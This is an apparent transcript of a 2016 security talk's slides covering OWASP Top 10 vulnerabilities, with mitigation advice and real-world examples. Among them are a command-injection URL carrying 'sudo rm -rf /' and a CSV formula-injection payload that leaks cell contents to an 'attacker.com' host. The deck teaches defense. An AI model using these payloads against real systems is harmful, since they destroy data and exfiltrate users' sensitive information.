Let's talk Security

Let's talk Security

Slides from Engineering Talkies at Wingify

99a1c6a52cc56cc25cde65be5d54081a?s=128

Dheeraj Joshi

April 21, 2016
Tweet

Transcript

  1. 2.

    About Me I find security vulnerabilities for fun & swag

    and I wear White Hat. Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, CloudFare, Intuit, Groupon, etc. What makes me happy?
  2. 3.

    Security - Into The Details • Owasp’s Top 10 Vulnerabilities

    ◦ Explain ◦ Impact ◦ Defense ◦ Real examples (External + Internal) • Demo - RCE • Q & A
  3. 4.

    Why should Startups Care about Security? Startups & SMEs are

    impromptu for cutting corners. One of the first things they cut is ‘Security'.
  4. 5.
  5. 9.

    PREVENT INJECTION • For databases use prepared statements • Whitelist

    inputs wherever possible • Sanitize inputs (use filter extension) • Don’t trust user input and always verify!
  6. 10.

    Example Google Command Injection We can include any command in

    the URL below https://console.cloud.google.com/home/dashboard? project=;sudo rm -rf / Found by an Indian Security Researcher (S. Venkatesh)
  7. 11.

    Exploiting ‘Export as CSV’ functionality Formula Injection =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click

    for further information") Fix - Append a single quote (‘) to the list of formula triggers ( =, +, -) If victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to attacker website, which may include other users’ sensitive information.
  8. 13.

    MITIGATION • Enforce strong password policy • Require periodic reset

    of password • Use 2 factor authentication • Use SSL and secure flag on cookies • Don’t neglect failed-login detection & tracking • Only use httpOnly cookies
  9. 14.

    CROSS SITE SCRIPTING - XSS • XSS attack users •

    “Javascript Injection” • Exploits can be bad, really bad..
  10. 17.
  11. 18.

    Protect Yourself • Use filter extension to filter inputs •

    Ensure that outputs are HTML encoded • Don’t reinvent the wheel • Don’t consider any part of the request as being “safe”
  12. 19.

    ngBind attribute $sanitize - service in module ngSanitize Sanitizes an

    html string by stripping all potentially dangerous tokens.
  13. 21.

    Scenario / Exploit 1) First, an attacker signup for an

    account and request ”forgot password”. 2) You will receive a link : https://vimeo.com/forgot_password/[user id]/[token]
  14. 22.

    Prevention • Low level access controls • Prevent user input

    in file/URL access commands • No unsanitized input to execution commands
  15. 24.

    PREVENTION > CURE • Perform periodic security checks using automated

    tools • Static Code Analysis • Example : Hardening MySQL, Directory Listing, Auth Tokens
  16. 25.

    SENSITIVE DATA EXPOSURE • Exposed PHP error messages • Unencrypted

    sensitive data storage • Not using SSL • Example: a sensitive token should not be sent to external websites (Fitbit)
  17. 26.

    MISSING FUNCTION LEVEL ACCESS CONTROL • Valid input processing without

    access controls • Decentralized access control layer • Example : Profile email address not validated (Github), S3 configuration
  18. 27.

    • Don’t perform data changes on GET • Use secure

    (csrf) tokens for POST • Impact : Real bad, attack users • Example : Dropbox, CodeSchool CROSS-SITE REQUEST FORGERY (CSRF)
  19. 28.

    • Not keeping libraries up-to-date • *cough*Wordpress*cough* • Example :

    Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE) USING COMPONENTS WITH KNOWN VULNERABILITIES
  20. 29.

    UNVALIDATED REDIRECTS AND FORWARDS • Header Injection • JavaScript Parameter

    Injection • Reliance on HTTP_REFERER • Abuse window opener (Facebook)
  21. 32.

    The solution • Reset all passwords and keys • Remove

    backdoors (not easy) OR Destroy everything??